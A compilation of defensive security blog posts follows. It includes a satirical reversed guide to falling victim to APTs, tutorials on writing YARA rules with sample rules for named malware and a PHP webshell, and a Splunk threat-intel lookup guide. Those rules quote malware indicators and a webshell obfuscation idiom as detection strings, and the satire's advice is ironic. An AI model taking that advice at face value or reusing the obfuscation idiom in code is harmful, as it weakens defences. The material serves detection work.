Web Proxy Event Analysis Cheat Sheet

The “Web Proxy Event Analysis Cheat Sheet” can help SOCs and security analysts classify proxy events (blocks, alerts) and is based on my ideas and many ideas from experts that helped me collect detection ideas for this document.

You can download version 1.0 here.

We also recommend checking Sigma’s “proxy” section for detection rules that can be used to detect threats in web proxy or similar logs as long as they contain web connection information (EDR, HIDS etc.).

 

Web Proxy Event Analysis Cheat Sheet

How to Fall Victim to Advanced Persistent Threats

During the last four years, I was engaged on incident response teams for several large advanced persistent threat (APT) cases involving different German corporations. In this time, we have developed methods and tools to detect compromised systems, while also planning and performing remediation. During the course of these investigations, I noticed that certain circumstances supported the chance that a corporation would fall victim to advanced persistent threats. In this article I want to focus on favorable preconditions that nearly ensure a successful APT attack.
The recommendations in this article were discussed and extended with the help of red team leaders and fellow CERT team members. This is an article inspired by a book named “Anleitung zum Herzinfarkt” by Bernhard Ludwig. This book provides serious guidance on how to increase the risk of dying from heart attack in someone’s early years. I found that this principle of a ‘humorous reversed guide’ could be useful to describe the typical pitfalls and mistakes that we regard as crucial for the development of advanced persistent threats with the aim to help organizations, which have not been hit by this type of attacks so far.

Don’t Create Network Segments

At first, strictly avoid placing systems in different network segments. Instead – keep it simple. Let standard Windows workstations, admin workstations, server systems, print servers, industrial control systems, backup servers, network management systems, monitoring servers, terminal servers, mobile management servers, development systems, IP cameras, house automation, and SIP telephones be in a single huge network in order to avoid firewalling issues.
That principle applies also to subsidiaries and affiliates. After the acquisition of other companies, don’t waste time asking them for compliance with your security policies. Save time and connect their network directly with your backbone! Make sure to allow any type of connection and create domain trusts as fast as possible to enable cross-domain resource access to your data center in Berlin from your user workstations in Brazil, as well as the call center in Bangladesh.
If you are required to create network zones for some reason, interconnect these zones with mutual Windows domain trust relationships. (see Titanic as an example)
why-titanic-sank
In order to maintain an environment of mutual trust and respect, never monitor the gateways between segments for port scanning, network sweeps, or other types of suspicious network activity. Also, please do not commit the new business unit to provide technical support in cases of suspicious activity and incident response.

Don’t Limit Privileged Account Usage

You trust your administrator, don’t you? So, let administrators use their privileged accounts to surf the web and read email while they are connected via SSH and RDP to their domain controllers and Internet facing servers in DMZ networks. Do not use hardened and intensely monitored jump servers from special admin workstations to manage your most important server networks.
Don’t waste precious resources creating administrative roles. If someone needs to install a text editor on a server, add him to the Domain Administrators group and make sure that no one ever figures out why you did this.
Do not use Microsoft’s solution called LAPS to ensure that all computers have different, complex, local administrator passwords or Privileged Admin Workstations (PAW) to provide a dedicated operating system for sensitive tasks. This would give attackers an unnecessarily hard time finding highly privileged credentials and fewer opportunities to use them.

Don’t Collect and Analyze Useful Log Data in a Central Location

Attackers tend to make themselves familiar with the environment and therefore cause strange peaks in log volumes that could be easily detected by an over-attentive employee – so, don’t log security events. If you do log events for any reason, make sure that all of your systems keep their logs in a local log file and do not transmit them to a central SIEM system.
IMG_6213
If you have to use a SIEM system, use Active Directory for authentication, so that attackers can find all the fine log data in a central place. If you have any problems on a server, such as with disk space due to the fact that you configured your golden image for Windows servers to use only 20GB of space on drive ‘C:’, don’t hesitate to reduce the log file size to a minimum. That may cause the log to overwrite itself every 30 minutes, but hey, each line that is overwritten can help prevent successful detection.
On Linux systems configure your log file rotation to keep 7 days, not more. Your IT staff typically needs a couple of days investigate the system owner and have some meaningful discussion with your data protection officer.
If you have to comply with certain policies that require the collection of log data, you still can do a lot to make sure that breaches remain undetected for months. Here is our Top 10:

  1. Only log and report high amounts of failed logins, because attackers tend to use valid credentials after taking the first hop
  2. Disregard all antivirus events that have the status “deleted” or “moved to quarantine”. They are gone, so they won’t trouble you.
  3. Do not collect the logs of client workstations to avoid detecting zero-day attacks. Detecting them would cause pressure to take action.
  4. Do not search for anomalies in your log files because hacker activities generate some very special or completely new log types. If you look for them you could find them – so again, don’t do that.
  5. Do only collect the log files at system level and disregard the logs of applications running higher up.
  6. Do not spend time understanding your organization’s structure, logging completeness, and logging behavior of your assets. It’s usually pretty complex and the less you know the better.
  7. Use the default logging configuration on your systems. Maybe you miss the most relevant event types, but if they really were relevant, wouldn’t they be in the default anyway?
  8. Monitor and report attacks on your Internet-facing firewall to tie up valuable resources with useless pie charts.
  9. Do not collect the logs of SysInternals Sysmon, AppLocker, Windows Defender, or Microsoft EMET. The protection provided from their use, especially when combined, is far too effective.
  10. Let the data protection officers and workers’ council decide on what you’re allowed to log and analyze.

Use your Active Directory for All Types of Authentication

Centralization is good. It saves resources and simplifies user administration. Use Active Directory authentication for everything: the logins to your proxy servers, network devices, online certificate authorities, virtual machine consoles, administrative jump hosts, security monitoring servers, VPN servers, SIEM system, and last but not least – backup servers.
This ensures that attackers take over the complete infrastructure after compromising a single outdated member server that has domain admin logon sessions. Remediation becomes much more exciting when attackers have access to proxies, DNS servers, and mail gateways all at once!

Don’t Regard the Client Workstations as the First Line of Defense

Since corporate workstations operate deep in the internal network, which are well protected by several firewalls and proxy servers, consider them to be far outside of the danger zone. Don’t audit them as frequently as you do with DMZ servers. There are so many more clients than servers that it is certainly not efficient to scan them all. Also, random samples never give a valid result, so let’s just drop the whole thing.
Don’t patch workstation software like Microsoft Office, PDF viewers, JAVA and Flash plugins, media players, and archivers as soon as a patch is published. Don’t use exploit protection, like Microsoft EMET, in order to increase the risk of zero-day attacks and finally,  don’t deactivate content in document viewers, such as JavaScript in Acrobat Reader or VBA in Microsoft Office.
Simplify administration of user workstations by granting standard users local administrative rights.
Also allow workstations to access the Internet directly on any service port. Don’t use a proxy server and do not monitor dropped connections on typical Trojan back connect ports. Developers and administrators are highly skilled professionals that tend to download and install suspicious software from the shadiest websites. Remember: You trust them and if they think that they need that (suspicious) software than of course they do. To increase the probability of such events, block Sourceforge, Github, and the whole category “Software Downloads” on your Internet proxy server.

Don’t Mind Antivirus Alerts

As mentioned before, do not consider antivirus alerts that have the status “deleted”, “cleaned”, or “moved to quarantine”. A deeper analysis of these events could reveal a Trojan that had control of the system for weeks before the right signature returned a match on components of a hack tool set that attackers moved from server to server. Therefore, do only check for errors and unresolved operational issues.
Make sure that no one pays special attention to antivirus events that report “Hack Tools”, “Password Dumpers”, or “Scanners”. Tell everyone that this would cause too many false positives because system administrators need these tools to find their assets and regain access to them.
FullSizeRender
Also avoid rating antivirus events according to an evaluation method. That’s so bureaucratic.
To allow attackers the greatest possible leeway, create vast exclusion lists and don’t use special Antivirus functions like PUA scanning or application controls that block password dumpers from accessing the memory.

Handle Web Servers Like Other Server Types

Regard web servers like any other server type. Frequently patching the web server service is perfectly sufficient. Do not audit the applications running on that web server; if you have to due to corporate policies, do it once, print the report, and archive it.
Place the web servers behind reverse proxy servers and tell everyone that this will protect them. If you repeat that constantly everyone will believe it one day. Do not protect the web servers with costly Web Application Firewalls and don’t collect the logs of such a system for central attack detection and analysis.
Allow developers to access the management interfaces, like JMX or Tomcat Manager, from remote locations. Don’t log access to these applications and don’t ban source IPs on security violations. Tell everyone that each developer may access the servers anytime, from anywhere, to reduce operational risks.
If you have to run Apache or Tomcat on a server, choose Windows as the operating system. Do not use limited user accounts to run the web server services in order to maximize the impact of a successful attack. Last but not least: Avoid annoying security features like SELinux.

A Few Last Words

I know that it is hard to guarantee a successful APT attack and that all of these recommendations require a certain amount of stubbornness and resistance to advice; however, even if this advice does not guarantee falling victim to advanced persistent threats, chances increase exponentially the more of my advice you apply. Good luck – I’ll keep my fingers crossed.
If you have further ideas that you want to share, please comment on this article or contact me on Twitter @cyb3rops.

Credits

Many thanks to Stephan Kaiser for the idea, Julia Stolz and Jeff for major reviews and Matthias Kaiser (@matthias_kaiser), Daniel Sauder (@DanielX4v3r), Thomas Patzke (@blubbfiction), Claas Rettinghausen, Robert Haist (@SleuthKid), Alexander Döhne for their valuable feedback.

How to Write Simple but Sound Yara Rules – Part 3

It has been a while since I wrote “How to Write Simple but Sound Yara Rules – Part 2“. Since then I changed my rule creation method to generate more versatile rules that can also be used for in-memory detection. Furthermore new features were added to yarGen and yarAnalyzer.

Binarly

The most important feature of the upcoming yarGen YARA Rule Generator release is the Binarly API integration.
Binarly is a “binary search engine” that can search arbitrary byte patterns through the contents of tens of millions of samples, instantly. It allows you to quickly get answers to questions like:

  • “What other files contain this code/string?”
  • “Can this code/string be found in clean applications or malware samples?”

Binary Search Engine - Binar.ly

Binary Search Engine – Binar.ly


This means that you can use Binarly to quickly verify the quality of your YARA strings.
Furthermore, Binarly has a YARA file search functionality, which you can use to scan their entire collection (currently at 7.5+ Million PE files, 3.5M clean – over 6TB) with your rule in a less than a minute.
For yarGen I integrated their API from https://github.com/binarlyhq/binarly-sdk.
In order to be able to use it you just need an API key that you can get for free if you contact them at contact@binar.ly. They are looking for researchers interested in testing the service. They limit the requests per day to 10,000 for free accounts – which is plenty. yarGen uses between 50 and 500 requests per sample during rule generation.
The following screenshot shows Binarly lookups in yarGen’s debugging mode. You can see that some of the strings produce a pretty high score. This score is added to the total score, which decides if a string gets included in the final YARA rule. The score generation process from the Binarly results is more complex than it might seem. For example, I had to score samples down that had 3000+ malware but also 1000 goodware matches. The goodware matches have higher weight than the malware matches. A string could have 15.000+ malware matches – if it also appears in 1000 goodware matches it does not serve as a good YARA rule string. I also handled cases in which small result sets lead to high Binarly scores.
Binarly Service Lookup in yarGen 0.16

Binarly Service Lookup in yarGen 0.16


Therefore the evaluation method that generates the score of each string has been further improved in the new version 0.16.0 of yarGen. Both the Binarly service and the new yarGen version are still ‘testing’. Do not upgrade your local yarGen installation to v0.16b in cases in which you rely on the rule generation process. Follow me and Daniel Radu (Binarly) on twitter to stay up-to-date.

Improved Rule Generation

But let’s talk about the improved rule generation process.
As described in my previous articles, I try to divide the list of strings generated by yarGen into two different groups:

  • Highly Specific Strings
    These strings include C2 server addresses, mutextes, PDB file names, tool/malware names (nbtscan.exe, iexp1orer.exe), tool outputs (e.g. keylog text output format), typos in common strings (e.g. “Micosoft Corporation”)
  • Suspicious Strings
    These strings look suspicious and uncommon but may appear in some exotic goodware, dictionary libraries or unknown software (e.g. ‘/logos.gif’, ‘&PassWord=’, ‘User-Agent: Mozilla’ > I’ve seen pigs fly – legitimate software contains the rarest strings)

In previous examples I always tended to combine these strings with magic header and file size. yarGen 0.15 and older versions generated those rules by default. The problem with these rules is that they do not detect the malware or tools to process memory.
Therefore I changed my rule generation process and adjusted yarGen to follow that example. As I said before, yarGen is not designed to generate perfect rules. Its main purpose is to generate raw rules that require the least effort to complete and could also work without further modification.
The following image shows how new rules are composed. They contain two main conditions, one for the file detection and one for the in-memory detection. I tried to copy the manual rule generation process as far as possible.

YARA Rule Creation

YARA rule composition (manual composition and yarGen v0.16)


The statement to detect files on disk combines the magic header, file size and only one of the highly specific strings OR a set of the suspicious strings.
For the in-memory detection I omit the magic header and file size. Highly specific strings and suspicious strings are combined with a logical AND.
The different statements (manual rule creation) look like this:

/* Detects File on Disk */
( uint16(0) == 0x5a4d and filesize < 100KB and ( 1 of ($x*) or 4 of ($s*) ) )
or
/* Detects Malware/Tool in Memory */
( 1 of ($x*) and 4 of ($s*) )

Here is an example of a rule produced by yarGen v0.16 (sample Unit 78020 – WininetMM.exe). I shows a ‘raw’ rule without further editing and the ‘scores’ included as comments:

rule WininetMM {
    meta:
        description = "Auto-generated rule - file WininetMM.exe"
        author = "YarGen Rule Generator"
        reference = "not set"
        date = "2016-04-15"
        hash1 = "bfec01b50d32f31b33dccef83e93c43532a884ec148f4229d40cbd9fdc88b1ab"
    strings:
        $x1 = ".?AVCWinnetSocket@@" fullword ascii /* PEStudio Blacklist: strings */ /* score: '40.00' (binarly: 30.0) */
        $x2 = "DATA_BEGIN:" fullword ascii /* PEStudio Blacklist: strings */ /* score: '36.89' (binarly: 27.89) */
        $x3 = "dMozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.0; .NET CLR 1.1.4322)" fullword wide /* PEStudio Blacklist: strings */ /* score: '32.53' (binarly: 5.53) */
        $s4 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)" fullword wide /* PEStudio Blacklist: strings */ /* score: '20.00' (binarly: -7.0) */
        $s5 = "Accept-Encoding:gzip,deflate/r/n" fullword wide /* PEStudio Blacklist: strings */ /* score: '10.35' (binarly: -1.65) */
        $s6 = "/%d%s%d" fullword ascii /* score: '10.27' (binarly: 0.27) */
        $s7 = "%USERPROFILE%\\Application Data\\Mozilla\\Firefox\\Profiles" fullword wide /* PEStudio Blacklist: strings */ /* score: '9.36' (binarly: -13.64) */
        $s8 = "Content-Type:application/x-www-form-urlencoded/r/n" fullword wide /* PEStudio Blacklist: strings */ /* score: '5.61' (binarly: -9.39) */
        $s9 = ".?AVCMyTlntTrans@@" fullword ascii /* score: '5.00' */
    condition:
        ( uint16(0) == 0x5a4d and filesize < 300KB and ( 1 of ($x*) and all of ($s*) ) ) or ( all of them )
}

You may ask “Why do the ‘DATA_BEGINS:’ and ‘.?AVCWinnetSocket@@’ do have such high scores”? Well, that’s the reason why analysts needs the support of big data:
Screen Shot 2016-04-15 at 12.51.40
Screen Shot 2016-04-15 at 12.52.01
I have to add that Binarly offers two query modes (fast/exact) of which yarGen uses the ‘fast’ mode. An analyst that doubts the produced results would use ‘exact’ query mode to verify the results manually. Please ask Daniel about the details.

yarAnalyzer – Inventory Generation

The new version of yarAnalyzer allows to generate an inventory of your YARA rule sets. This features comes in very handy in cases in which you have to handle a big set of rules. The ‘–inventory’ option generates a CSV file that can be prettied up in MS Excel or Openoffice Calc.

YARA Rule Analyzer

yarAnalyzer Inventory

YARA Rules to Detect Uncommon System File Sizes

YARA is an awesome tool especially for incident responders and forensic investigators. In my scanners I use YARA for anomaly detection on files. I already created some articles on “Detecting System File Anomalies with YARA” which focus on the expected contents of system files but today I would like to focus on the size of certain system files.
I did a statistical analysis in order to rate a suspicious “csrss.exe” file and noticed that the size of the malicious file was way beyond the typical file size. I thought that I should do this for other typically abused file names based on this blog post by @hexacorn.
I used my VT Intelligence access and burned some searches to create this list.
System Files and Sizes

System Files and Sizes


You can find a spread sheet of this list here. It can be edited by everyone.
I created some YARA rules that use the external variable “filename” to work. LOKI and THOR use the “filename” and other external variables by default.
UPDATE 23.12.15 4:50pm:
I’ll update the list on the LOKI github page. For a current version of the YARA signatures visit this page.

rule Suspicious_Size_explorer_exe {
    meta:
        description = "Detects uncommon file size of explorer.exe"
        author = "Florian Roth"
        score = 60
        date = "2015-12-21"
    condition:
        uint16(0) == 0x5a4d
        and filename == "explorer.exe"
        and ( filesize < 1000KB or filesize > 3000KB )
}
rule Suspicious_Size_chrome_exe {
    meta:
        description = "Detects uncommon file size of chrome.exe"
        author = "Florian Roth"
        score = 60
        date = "2015-12-21"
    condition:
        uint16(0) == 0x5a4d
        and filename == "chrome.exe"
        and ( filesize < 500KB or filesize > 1300KB )
}
rule Suspicious_Size_csrss_exe {
    meta:
        description = "Detects uncommon file size of csrss.exe"
        author = "Florian Roth"
        score = 60
        date = "2015-12-21"
    condition:
        uint16(0) == 0x5a4d
        and filename == "csrss.exe"
        and ( filesize > 18KB )
}
rule Suspicious_Size_iexplore_exe {
    meta:
        description = "Detects uncommon file size of iexplore.exe"
        author = "Florian Roth"
        score = 60
        date = "2015-12-21"
    condition:
        uint16(0) == 0x5a4d
        and filename == "iexplore.exe"
        and ( filesize < 75KB or filesize > 910KB )
}
rule Suspicious_Size_firefox_exe {
    meta:
        description = "Detects uncommon file size of firefox.exe"
        author = "Florian Roth"
        score = 60
        date = "2015-12-21"
    condition:
        uint16(0) == 0x5a4d
        and filename == "firefox.exe"
        and ( filesize < 265KB or filesize > 910KB )
}
rule Suspicious_Size_java_exe {
    meta:
        description = "Detects uncommon file size of java.exe"
        author = "Florian Roth"
        score = 60
        date = "2015-12-21"
    condition:
        uint16(0) == 0x5a4d
        and filename == "java.exe"
        and ( filesize < 140KB or filesize > 900KB )
}
rule Suspicious_Size_lsass_exe {
    meta:
        description = "Detects uncommon file size of lsass.exe"
        author = "Florian Roth"
        score = 60
        date = "2015-12-21"
    condition:
        uint16(0) == 0x5a4d
        and filename == "lsass.exe"
        and ( filesize < 13KB or filesize > 45KB )
}
rule Suspicious_Size_svchost_exe {
    meta:
        description = "Detects uncommon file size of svchost.exe"
        author = "Florian Roth"
        score = 60
        date = "2015-12-21"
    condition:
        uint16(0) == 0x5a4d
        and filename == "svchost.exe"
        and ( filesize < 14KB or filesize > 40KB )
}
rule Suspicious_Size_winlogon_exe {
    meta:
        description = "Detects uncommon file size of winlogon.exe"
        author = "Florian Roth"
        score = 60
        date = "2015-12-21"
    condition:
        uint16(0) == 0x5a4d
        and filename == "winlogon.exe"
        and ( filesize < 279KB or filesize > 510KB )
}
rule Suspicious_Size_igfxhk_exe {
    meta:
        description = "Detects uncommon file size of igfxhk.exe"
        author = "Florian Roth"
        score = 60
        date = "2015-12-21"
    condition:
        uint16(0) == 0x5a4d
        and filename == "igfxhk.exe"
        and ( filesize < 200KB or filesize > 265KB )
}
rule Suspicious_Size_servicehost_dll {
    meta:
        description = "Detects uncommon file size of servicehost.dll"
        author = "Florian Roth"
        score = 60
        date = "2015-12-23"
    condition:
        uint16(0) == 0x5a4d
        and filename == "servicehost.dll"
        and filesize > 150KB
}
rule Suspicious_Size_rundll32_exe {
    meta:
        description = "Detects uncommon file size of rundll32.exe"
        author = "Florian Roth"
        score = 60
        date = "2015-12-23"
    condition:
        uint16(0) == 0x5a4d
        and filename == "rundll32.exe"
        and ( filesize < 30KB or filesize > 60KB )
}
rule Suspicious_Size_taskhost_exe {
    meta:
        description = "Detects uncommon file size of taskhost.exe"
        author = "Florian Roth"
        score = 60
        date = "2015-12-23"
    condition:
        uint16(0) == 0x5a4d
        and filename == "taskhost.exe"
        and ( filesize < 45KB or filesize > 85KB )
}
rule Suspicious_Size_spoolsv_exe {
    meta:
        description = "Detects uncommon file size of spoolsv.exe"
        author = "Florian Roth"
        score = 60
        date = "2015-12-23"
    condition:
        uint16(0) == 0x5a4d
        and filename == "spoolsv.exe"
        and ( filesize < 50KB or filesize > 800KB )
}
rule Suspicious_Size_smss_exe {
    meta:
        description = "Detects uncommon file size of smss.exe"
        author = "Florian Roth"
        score = 60
        date = "2015-12-23"
    condition:
        uint16(0) == 0x5a4d
        and filename == "smss.exe"
        and ( filesize < 40KB or filesize > 140KB )
}
rule Suspicious_Size_wininit_exe {
    meta:
        description = "Detects uncommon file size of wininit.exe"
        author = "Florian Roth"
        score = 60
        date = "2015-12-23"
    condition:
        uint16(0) == 0x5a4d
        and filename == "wininit.exe"
        and ( filesize < 90KB or filesize > 250KB )
}

I ran this rule set over my goodware database and got only a few false positives. Feel free to use these rules wherever you like but please share new rules or statistical analyses on other system files.

Yara System File Checks - False Positives

False Positives

How to Write Simple but Sound Yara Rules – Part 2

How to Write Simple but Sound Yara Rules – Part 2

Months ago I wrote a blog article on “How to write simple but sound Yara rules“. Since then the mentioned techniques and tools have improved. I’d like to give you a brief update on certain Yara features that I frequently use and tools that I use to generate and test my rules.

Handle Very Specific Strings Differently

In the past I was glad to see very specific strings in samples and sometimes used these strings as the only indicator for detection. E.g. whenever I’ve found a certain typo in the PE header fields like “Micorsoft Corportation” I cheered and thought that this would make a great signature. But – and I have to admit that now – this only makes a nice signature. Great signatures require not only to match on a certain sample in the most condensed way but aims to match on similar samples created by the same author or group.
Look at the following rule:

rule Enfal_Malware_Backdoor {
    meta:
        description = "Generic Rule to detect the Enfal Malware"
        author = "Florian Roth"
        date = "2015/02/10"
        super_rule = 1
        hash0 = "6d484daba3927fc0744b1bbd7981a56ebef95790"
        hash1 = "d4071272cc1bf944e3867db299b3f5dce126f82b"
        hash2 = "6c7c8b804cc76e2c208c6e3b6453cb134d01fa41"
        score = 60
    strings:
        $x1 = "Micorsoft Corportation" fullword wide
        $x2 = "IM Monnitor Service" fullword wide
        $a1 = "imemonsvc.dll" fullword wide
        $a2 = "iphlpsvc.tmp" fullword
        $a3 = "{53A4988C-F91F-4054-9076-220AC5EC03F3}" fullword
        $s1 = "urlmon" fullword
        $s2 = "Registered trademarks and service marks are the property of their" wide
        $s3 = "XpsUnregisterServer" fullword
        $s4 = "XpsRegisterServer" fullword
    condition:
        uint16(0) == 0x5A4D and
        (
            ( 1 of ($x*) ) or
            ( 2 of ($a*) and all of ($s*) )
        )
}

What I do when I review the 20 strings that are generated by yarGen is that I try to categorize the extracted strings in 3 different groups:

  • Very specific strings (one of them is sufficient for successful detection, e.g. IP addresses, payload URLs, PDB paths, user profile directories)
  • Specific strings (strings that look good but may appear in goodware as well, e.g. “wwwlib.dll”)
  • Other strings (even strings that appear in goodware; without random code from compressed or encrypted data; e.g. “ModuleStart”)

Then I create a condition that defines:

  • A Certain Magic Header (remove it in case of ASCII text like scripts or webshells)
  • 1 of the very specific strings OR
  • some of the specific strings combined with many (but not all) of the common strings

Here is another example that does only have very specific strings (x) and common strings (s):

rule Cobra_Trojan_Stage1 {
    meta:
        description = "Cobra Trojan - Stage 1"
        author = "Florian Roth"
        reference = "https://blog.gdatasoftware.com/blog/article/analysis-of-project-cobra.html"
        date = "2015/02/18"
        hash = "a28164de29e51f154be12d163ce5818fceb69233"
    strings:
        $x1 = "KmSvc.DLL" fullword wide
        $x2 = "SVCHostServiceDll_W2K3.dll" fullword ascii
        $s1 = "Microsoft Corporation. All rights reserved." fullword wide
        $s2 = "srservice" fullword wide
        $s3 = "Key Management Service" fullword wide
        $s4 = "msimghlp.dll" fullword wide
        $s5 = "_ServiceCtrlHandler@16" fullword ascii
        $s6 = "ModuleStart" fullword ascii
        $s7 = "ModuleStop" fullword ascii
        $s8 = "5.2.3790.3959 (srv03.sp2.070216-1710)" fullword wide
    condition:
        uint16(0) == 0x5A4D and filesize < 50000 and 1 of ($x*) and 6 of ($s*)
}

If you can’t create a rule that is sufficiently specific, I recommend the following methods to restrict the rule:

  • Magic Header (use it as first element in condition – see performance guidelines, e.g. “uint16(0) == 0x5A4D”)
  • File Size (malware that mimics valid system files, drivers or legitimate software often differs significantly in size; try to find the valid files online and set a size value in your rule, e.g. “filesize > 200KB and filesize < 600KB")
  • String Location (see the “Location is Everything” section)
  • Exclude strings that occur in false positives (e.g. $fp1 = “McAfeeSig”)

Location is Everything

One of the most underestimated features of Yara is the possibility to define a range in which strings occur in order to match. I used this technique to create a rule that detect metasploit meterpreter payloads quite reliably even if it’s encoded/cloaked. How that?
If you see malware code that is hidden in an overlay at the end of a valid executable (e.g. “ab.exe”) and you see only strings that are typical function exports or mimics a well-known executable ask the following questions:

  • Is it normal that these strings are located at this location in the file?
  • Is it normal that these strings occur more than once in that file?
  • Is the distance between two strings somehow specific?

Malware Strings

Malware Strings


In case of the unspecific malware code in the PE overlay, try to define a rule that looks for a certain file size (e.g. filesize > 800KB) and the malware strings relative to the end of the file (e.g. $s1 in (filesize-500..filesize)).
The following example shows a unspecified webshell that contains strings that may be modified by an attacker in future versions when applied in a victim’s network. Try always to extract strings that are less likely to be changed.
Webshell Code PHP

Webshell Code PHP


The variable name “$code” is more likely to change than the function combination “@eval(gzinflate(base64_decode(” at the end of the file. It is possible that valid php code contains “eval(gzinflate(base64_decode(” somewhere in the code but it is less likely that it occurs in the last 50 bytes of the file.
I therefore wrote the following rule:

rule Webshell_b374k_related_1 {
    meta:
        description = "Detects b374k related webshell"
        author = "Florian Roth"
        reference = "https://goo.gl/ZuzV2S"
        score = 65
        hash = "d5696b32d32177cf70eaaa5a28d1c5823526d87e20d3c62b747517c6d41656f7"
        date = "2015-10-17"
    strings:
        $m1 = "<?php"
        $s1 = "@eval(gzinflate(base64_decode(" ascii
    condition:
        $m1 at 0 and $s1 in (filesize-50..filesize) and filesize < 20KB
}

Performance Guidelines

I collected many ideas by Wesley Shields and Victor M. Alvarez and composed a gist called “Yara
Performance Guidelines”. This guide shows you how to write Yara rules that use less CPU cycles by avoiding CPU intensive checks or using new condition checking shortcuts introduced in Yara version 3.4.
Yara Performance Guidelines

PE Module

People sometimes ask why I don’t use the PE module. The reason is simple: I avoid using modules that are rather new and would like to see it thoroughly tested prior using it in my scanners running in productive environments. It is a great module and a lot of effort went into it. I would always recommend using the PE module in lab environments or sandboxes. In scanners that walk huge directory trees a minor memory leak in one of the modules could lead to severe memory shortages. I’ll give it another year to prove its stability and then start using it in my rules.

yarGen

yarGen has an opcode feature since the last minor version. It is active by default but only useful in cases in which not enough strings could be extracted.
I currently use the following parameters to create my rules:

python yarGen.py --noop -z 0 -a "Florian Roth" -r "http://link-to-sample" /mal/malware

The problem with the opcode feature is that it requires about 2,5 GB more main memory during rule creation. I’ll change it to an optional parameter in the next version.

yarAnalyzer

yarAnalyzer is a rather new tool that focuses on rule coverage. After creating a bigger rule set or a generic rule that should match on several samples you’d like to check the coverage of your rules in order to detect overlapping rules (which is often OK).
yarAnalyzer helps you to get an overview on:

  • rules that match on more than one sample
  • samples that show hits from more than one rule
  • rules without hits
  • samples without hits

Yara Rule Analyzer

yarAnalayzer Screenshot


yarAnalyzer Github Repository

String Extraction and Colorization

To review the strings in a sample I use a simple shell one-liner that a good friend sent me once.
“strings” version for Linux

#!/bin/bash
(strings -a -td "$@" | sed 's/^\(\s*[0-9][0-9]*\) \(.*\)$/\1 A \2/' ; strings -a -td -el "$@" | sed 's/^\(\s*[0-9][0-9]*\) \(.*\)$/\1 W \2/') | sort -n

“gstrings” version for OS X (sudo port install binutils)

#!/bin/bash
(gstrings -a -td "$@" | gsed 's/^\(\s*[0-9][0-9]*\) \(.*\)$/\1 A \2/' ; gstrings -a -td -el "$@" | gsed 's/^\(\s*[0-9][0-9]*\) \(.*\)$/\1 W \2/') | sort -n

It produces an output as shown in the above screenshot with green text and the description “Malware Strings” showing the offset, ascii (A) or wide (W) and the string at this offset.
For a colorization of the string check my new tool “prisma” that colorizes random type standard output.

Prisma STDOUT colorization

Prisma STDOUT colorization

Contact

Follow me on Twitter: @Cyb3rOps

Splunk Threat Intel IOC Integration via Lookups

Splunk Threat Intel IOC Integration via Lookups

Today most security teams have access to a lot of different information sources. On the one hand they collect log data from different sources and try to correlate them in a useful way in so-called SIEM systems. On the other hand they receive threat information from different sources like APT reports, public or private feeds or derive those indicators from their own investigations and during incident response.
Therefore one of the main tasks of security monitoring today is to combine these different data sources, which means to apply the threat intel information to the data that is already available in SIEM systems or scan for it on-demand using tools like my free IOC scanner LOKI or our APT Scanner THOR.
In this article I would like to describe a method to apply threat intel information to log data in Splunk using simple lookup definitions.
I recently integrated two different threat intel receivers in my free IOC scanner LOKI. One of them fetches all IOC (indicator of compromise) elements from AlienVault’s Open Threat Exchange platform OTX and saves them to a subfolder in the LOKI program folder in order to be initialized during startup.
This weekend I added a new option called “–siem” that instructs the receiver to generate a CSV file with header line and the correct format for a lookup definition in Splunk.
Example - Threat Intel Feed OTX Receiver (LOKI)

Example – Threat Intel Feed OTX Receiver (LOKI)


The resulting file for the hash IOCs looks like this:
Threat Intel CSV for Splunk Lookup

Threat Intel Hash CSV for Splunk Lookup


Using the “-o” parameter you are able to select an output folder. I chose the folder for the lookup definitions in the search app, which is “$SPLUNK_HOME/etc/apps/search/lookups”.
Threat Intel SIEM Integration CSV Lookup

Threat Intel CSV Files in Splunk Search App Lookup Folder


After saving the output files to this directory we can select the CSV file in the lookup definition settings dialog (Settings > Lookups > Lookup definitions > Add new). I named the lookup “otxhash”.
Splunk Threat Intel Integration Lookup Definition

Threat Intel CSV File Lookup Definition in Splunk


Now we can apply this lookup to all log data that contains file hash information like Antivirus logs, THOR and LOKI scan results or in this case the logs of Microsoft Sysmon.
Windows Sysmon Log Data in Splunk

Windows Sysmon Log Data in Splunk


Using the free Add-on for Microsoft Sysmon all the log fields will be extracted automatically. You will see a field named “Hash” that can be used in our search definitions to allow a direct lookup.
Windows Sysmon Log Data in Splunk

Windows Sysmon Log Data with Hash Values of Executables


The lookup compares the “Hash” field from the Sysmon event message with the “hash” field from the OTX threat intel CSV file and sets a new “threat_description” field with the value of the “description” field from the CSV.

index=windows_sysmon
| lookup otxhash hash AS Hash OUTPUT description AS threat_description
| search threat_description=*
| table UtcTime,ComputerName,User,Hash,ProcessId,CommandLine,threat_description

After the lookup I search for all entries that have a “threat_description” field set and display them in a easy-to-read table view. Only entries that had a “Hash” matching on a “hash” from the CSV will have this new field set. In the example below I had a match on an unwanted application called “Pantsoff” that I used in my Lab environment for this POC.

Threat Intel CSV Lookup in Splunk

Threat Intel Lookup in Splunk


I would define this search as an “Alert” that runs every 15 minutes and searches in log data of the last 15 minutes in order to get immediately informed if a blacklisted executable had been used. (avoid realtime searches/alerts in Splunk)
Furthermore the threat intel receiver should be scheduled via cron in order to run hourly/daily.
The two other files create by the threat intel receiver contain information on filenames and C2 server (hostnames, IPs) that can be applied in a similar way. The only small downer is that Lookups can only be used for “equal” matches and don’t allow to search for elements that “contain” certain fields of the CSV file. This is no problem in case of the C2 server definitions but for the filename definitions, which can be e.g. “AppData\\evil.exe”.
I’ll improve the Threat Intel Receivers in the coming weeks and add the “–siem” option to the MISP Receiver as well.
I hope you enjoyed the article and found it inspiring even if you don’t use Splunk or the other mentioned tools.
Besides: I am working on a RESTful web service with the working title “TRON” that allows to query for threat intel indicators and supports different comparison modes including including the missing “contains” supporting OpenIOC and STIX as input files. It is not ready yet but I’ll inform you as soon as there is something to show.
Follow me on Twitter via @Cyb3rOps

Detect System File Manipulations with SysInternals Sysmon

SysInternals Sysmon is a powerful tool especially when it comes to anomaly detection. I recently developed a method to detect system file manipulations, which I would like to share with you.
We know how to track processes with the standard Windows audit policy option “Audit process tracking”, but Sysmon messages contain much more information to evaluate. By using Sysmon on many systems within the network and collecting all the logs in a central location you’ll get a database full of interesting attributes and Metadata which can be statistically analyzed in order to identify anomalies.
Carlos Perez wrote a really good article on Sysmon, which you should check out if you’re new to Sysmon and its capabilities.

Anomaly Detection

